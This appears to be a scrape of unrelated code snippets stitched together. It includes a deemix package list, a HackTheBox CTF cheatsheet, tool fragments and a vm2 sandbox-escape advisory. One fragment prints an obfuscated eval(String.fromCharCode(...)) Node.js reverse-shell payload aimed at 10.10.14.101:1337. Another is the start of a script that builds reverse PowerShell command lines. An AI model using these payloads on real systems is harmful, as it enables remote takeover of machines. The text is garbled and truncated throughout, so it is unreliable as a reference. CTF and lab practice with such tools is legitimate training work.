Thanks to /u/zpoo32 for reporting several issues in this list!
- deemix: just the cli and the library
- deemix-pyweb: the app with a GUI
- deemix-server: just the server part of deemix-pyweb
Thanks to /u/zpoo32 for reporting several issues in this list!
Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.
Because a smart man once said: "Never google twice."
./nodeshell.py 10.10.14.101 1337 | |
[+] LHOST = 10.10.14.101 | |
[+] LPORT = 1337 | |
[+] Encoding | |
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,49,48,49,34,59,10,80,79,82,84,61,34,49,51,51,55,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,9 |
#!/usr/bin/env python3 | |
# | |
# generate reverse powershell cmdline with base64 encoded args | |
# | |
import sys | |
import base64 | |
def help(): | |
print("USAGE: %s IP PORT" % sys.argv[0]) |
import requests | |
import json | |
import sys | |
import argparse | |
_strip = ['http://', 'https://', 'www'] | |
G = '\033[92m' | |
Y = '\033[93m' |
0 | |
00 | |
01 | |
02 | |
03 | |
1 | |
1.0 | |
10 | |
100 | |
1000 |
from pydriller import RepositoryMining | |
import re | |
import base64 | |
foundSet = set() | |
for commit in RepositoryMining('./').traverse_commits(): | |
for mod in commit.modifications: | |
if mod.source_code_before != None: | |
regex = re.findall(r"<text encoding=\"base64\">[^>]+</text>", mod.source_code_before) | |
for result in regex: |
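vm2 versions up to 3.9.16 contain a vulnerability in exception sanitization: an attacker can raise an unsanitized host exception inside handleException(), which can be used to escape the sandbox and run arbitrary code in the host context. Anything that runs untrusted code under an affected vm2 version should be upgraded past 3.9.16, and the in-process sandbox should not be the only isolation boundary around that code.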